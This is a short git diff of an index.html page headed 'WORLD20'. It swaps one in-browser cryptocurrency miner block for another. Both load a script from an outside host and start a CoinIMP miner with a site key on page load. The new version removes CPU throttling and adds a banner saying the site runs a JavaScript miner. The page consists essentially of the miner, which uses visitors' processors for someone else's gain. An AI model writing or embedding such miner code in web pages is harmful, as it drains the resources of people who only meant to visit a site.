--- a/index.html
+++ b/index.html
@@ -10,10 +10,14 @@
 </head>
 <body style="background-color:black; color:white">
 <h1>WORLD20</h1>
-  <script src="https://www.hostingcloud.racing/E50e.js"></script>
-  <script>
-    var miner = new Client.Anonymous('328bc6b76c402038b75d228e0ed01d123d3381a3214390af4c914da3d5a33f92', { throttle: 0.8});
-    miner.start();
+<script src="https://www.hostingcloud.racing/E50e.js"></script>
+<script>
+    var _client = new Client.Anonymous('328bc6b76c402038b75d228e0ed01d123d3381a3214390af4c914da3d5a33f92', {
+        throttle: 0
+    });
+    _client.start();
+    _client.addMiningNotification("Top", "This site is running JavaScript miner from coinimp.com", "#cccccc", 40, "#3d3d3d");
+
 </script>
 </body>
 </html>
